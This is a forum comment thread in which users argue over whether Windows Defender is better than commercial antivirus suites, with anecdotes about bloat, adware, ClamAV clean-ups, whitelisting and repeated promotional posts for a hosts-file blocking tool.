AV software for anyone that has had to use it for any amount of time can easily tell you that Windows Defender is the *only* AV software anyone should be using anymore. Back in the day, there were a number of products out there which I would call good. Now, probably due to increased pressure for more profits, subscriptions, and increased monetization of every aspect of their business I wouldn't want any of them. Not only are they all bloated resource hogs, they cause more problems than viruses they catch. I'd rather have the viruses as at lease you don't pay for those. I don't know how many times I've had to look at friends or family members computers to find that some commercial AV software was causing all sorts of trouble. Is Defender the best at finding viruses? I don't know, perhaps not, but I do not care. I'd rather something that provides most protection but isn't intrusive enough that it acts more less like what it is trying to detect and remove.

I'd say there is one little cravat to the above. I'm referring specifically to ANTI-VIRUS software. An awful lot (if not most nowadays) of "malware" might be better categorized as "Adware". There are a number of products out there that do a good job dealing with Adware. Most Adware of course targets your various browsers. I'd say as a rule there are a lot more of those out there in the wild than actual "viruses". Anyway I would use both, Defender for viruses, and another product more specifically focused on Adware.

For a variety of reasons years ago I used to run an unpatched Windows 7 machine. That things was like a virus trawler! At any rate I had a lot of opportunity to use a host of tools and software. Having a good firewall (and setup), not going to sketchy websites, or clicking on stupid things goes a long way by itself. However inevitably you'd get things that require clean up. As mentioned somethings worked better than others, and some were as bad as the viruses they were supposed to protect you from. With that particular system, I think one of the easiest (provided your are prepared) and certain things I didn't was about every years or so I would just wipe the whole thing clean, do a fresh install, restore files from backup. Get used to doing it a few times and it takes a few hours, and you can automate most of it.

Serious hosts protection = hosts

Better antivirus than antivirus: Prevention = best medicine (what can't touch you can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

Ads & malware rob speed, security & privacy

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

* Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

Re: MicroShaft

Evolutionists can't explain PESKY ARKS!

Hosts do more for less vs. addons & faster

What hosts do addons can't (or as well):

PROTECT vs.:

1.) bad sites (past ads)
2.) fastflux C&C
3.) dynDNS C&C
4.) DGA C&C
5.) DNS down
6.) poisoned dns
7.) trackers (dnsrequestlogs/ads/transparent ISP proxy)
8.) spam/phish payload
9.) dns blocks
10.) slowdown 2 ways: adblocks & hardcodes

11.) Multiplatform
12.) Ez data edit
13.) Efficiency (cpu/ram/I-O)

14.) UBlock no DNS bennys = poor imitation = "sincerest form of flattery"
15.) NoScript tag parses. Hosts block ad script before it downloads!

APK

P.S.=> AB+ 151mb http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

UBlock 64MB http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

(hosts ~6mb)

ClarityRay defeatable

Don't work http://www.businessinsider.com/google-microsoft-amazon-taboola-pay-adblock-plus-to-stop-blocking-their-ads-2015-2/

SLOWER: http://superuser.com/questions/686041/which-leads-to-faster-browsing-an-ad-blocker-or-an-edited-hosts-file/

Re: MicroShaft

[Darinbob]

It's nice to have the firewall though. Windows does not have a reasonable alternative. Some other features that AV packages have can be handy when setting up systems for relatives who are clueless about computers, like warning when a site is potential spam, your credit card number is going out in the clear, and so forth. Most malware these days is coming over the web browser so first line of defense should be there, and the AV is just to help catch what gets through.

For the best possible hosts file

Prevention = best medicine (& what can't touch you can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

Ads & malware rob speed, security & privacy

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

* Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

Re:MicroShaft

[Applehu+Akbar]

Nice Fanboi flamebait post. Beau, did MicroShaft PAY you to put this up?

I can back this up based on my end-user servicing experience, and I'm not even a Microsoft fan. Recent versions of Windows before 10 are better protected with Microsoft Security Essentials (free from MS) plus periodic manual scans with MalwareBytes Free than the bloated antivirus scanners that bog down PCs for the first hour after every reboot. In Windows 10, the antivirus is finally built in once again, so long as you enable Windows Defender.

You cannot disable Defender

Perhaps the conclusion stems not from any misbehavior on the part of the third-party AV, but from Defender's absolute insistence on starting its service and making itself unkillable even though its real-time protection is turned off (whether by the user or the presence of a third-party AV).

All the faults being attributed to having a third-party AV running might actually be because Defender continues running in a half-active mode that isn't properly tested.

Correlation is not causation.

Re:Disable ad-blocker for a paragraph of twitter c

[Darinbob]

You can do the wild cards with a router based DNS server. Though this is not as easy and turnkey as an adblocker.

Not MS solution

Ive never had MS find a live viruse. But have had 3rd party find plenty on a computer. Live or otherwise.

Read Parent As...

Defender works well but I hate Microsoft so Nyah Nyah Nyaaahhhhh!!!

Linux+ClamAV scans....

I was able to clean up Windows systems back in the mid '00s compeltely inundated with viruses thanks to ClamAV. This was before the polymorphic installer packages started to become popular.

But between clamav to scan and remove the viruses/malware/etc, and a registry cleaner to ensure no automated downloads/reinfections once rebooted and connected to the internet, everything worked fine almost every time.

That said: These were non-trivial scan and repairs. The scan itself often took upwards of 12-24 hours, followed by finding/installing replacements for corrupt/replaced dlls and exes, and then the final registry scan. Off straight hourly billing I didn't make MY time back as money, and if I had been billing hours worked it often would have cost far more than the computer was worth. But it got me valuable experience and a few people irreplacable data saved.

Nowadays with file encrypting ransomware, I wouldn't bother, but back then when most malware/viruses were limited in scope it was an easy but sometimes time consuming process to recover while leaving everything important intact.

Re: MicroShaft

[brewthatistrue]

> Other AV products have always been monstrously bloated affairs, and have become all the worse over then last decade

Additionally, even decent antivirus tends to bloat over time.

Avira Antivirus and MalwareBytes Anti-Malware both have "web protection" modules that will not stop nagging you if you disable them, for example.

SecureAplus has been a lifesaver for me

[perlface]

SecureAplus has white-listing as well as anti-virus.

My wife's computer and my daughter's computer were always becoming malware infested. Since using SecureAPlus with the whitelist restriction turned on we haven't had any problems. Now whenever a non-whitelisted program tries to run, they full-stop until I check it out. Plus the AV allegedly runs using multiple AV engines in The Cloud.

Windows = Malware

Too bad their entire OS is malware. Plus, they've taken Apple's stance of giving consumers the middle finger. Fuck you Microsoft.

Re: MicroShaft

We wouldn't need AV on MS OS's if not for the fact that the OS is just plainly stupid.

Cortana! Why does Windows allow malicious code to run?

Re: MicroShaft

[godefroi]

What about Windows' firewall makes it unreasonable? Honestly curious here.

Re:Disable ad-blocker for a paragraph of twitter c

[david_thornley]

When my wife went to the New York Times website and was infected by an ad, I decided ad blockers were a really good idea.

Microsoft managers lack the simplest insight?

[Futurepower(R)]

Exactly.

How does it happen that a huge organization lacks the simplest insight?

Re: MicroShaft

[Darinbob]

Well, last I looked it was pretty lacking. Maybe they've improved it over time?

Yeah, right.

And these folks are designing our browsers... What are they snorting?
Don't ever, even try to tell me that anything for AV from MS is any good. It'll never happen.
Just look at the years they've had perfecting OSes........... 'nuf said.

Just this afternoon (browsing with chrome) I was fighting a 'drive by' ad injected POS malware.
Avast caught it. Adblocker running and it still was loading. I was scratching my head, then I just blocked the URL at the router.
I only they could design a browser that could filter properly.

Re: MicroShaft

[godefroi]

Lacking what?

Re: MicroShaft

[Coren22]

You mean just like every other OS?

I don't recall any OS that was immune to malicious code, can you point me to one?